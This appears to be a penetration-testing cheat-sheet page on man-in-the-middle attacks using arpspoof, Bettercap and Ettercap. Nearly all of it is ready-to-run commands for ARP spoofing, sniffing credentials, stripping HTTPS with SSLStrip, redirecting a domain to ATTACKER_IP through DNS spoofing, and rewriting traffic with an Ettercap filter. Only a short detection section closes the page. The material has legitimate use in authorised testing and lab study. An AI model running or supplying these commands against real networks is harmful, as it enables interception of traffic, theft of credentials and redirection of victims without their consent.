Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
ARP Spoofing — arpspoof
Enable IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
Spoof
arpspoof -i eth0 -t TARGET_IP GATEWAY_IP
arpspoof -i eth0 -t GATEWAY_IP TARGET_IP
Bettercap
Install
Start
ARP Spoof
» net.probe on
» set arp.spoof.targets TARGET_IP
» arp.spoof on
» net.sniff on
Capture Credentials
» set net.sniff.verbose true
» net.sniff on
HTTP Proxy (SSLStrip)
» set http.proxy.sslstrip true
» http.proxy on
» arp.spoof on
» net.sniff on
Caplet (Script)
# spoof.cap
set arp.spoof.targets TARGET_IP
arp.spoof on
net.sniff on
bettercap -iface eth0 -caplet spoof.cap
DNS Spoofing
» set dns.spoof.domains target.com
» set dns.spoof.address ATTACKER_IP
» dns.spoof on
Ettercap
GUI
CLI — ARP Spoof
ettercap -T -q -i eth0 -M arp:remote /TARGET_IP// /GATEWAY_IP//
With Filter
ettercap -T -q -i eth0 -M arp:remote -F filter.ef /TARGET_IP// /GATEWAY_IP//
Compile Filter
etterfilter filter.ecf -o filter.ef
Filter Example (Replace Text)
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
}
}
echo 1 > /proc/sys/net/ipv4/ip_forward
# Send fake ARP replies
# Tell target: "I am the gateway"
# Tell gateway: "I am the target"
# Use scapy or arpspoof
Detection
# Check ARP table for duplicates
arp -a | sort
# Wireshark filter
arp.duplicate-address-detected
Quick Reference
| Task | Command |
|---|
| ARP spoof | arpspoof -i eth0 -t TARGET GATEWAY |
| Bettercap | bettercap -iface eth0 → arp.spoof on |
| Ettercap | ettercap -T -M arp:remote /TARGET// /GW// |
| DNS spoof | Bettercap: dns.spoof on |
| IP forward | echo 1 > /proc/sys/net/ipv4/ip_forward |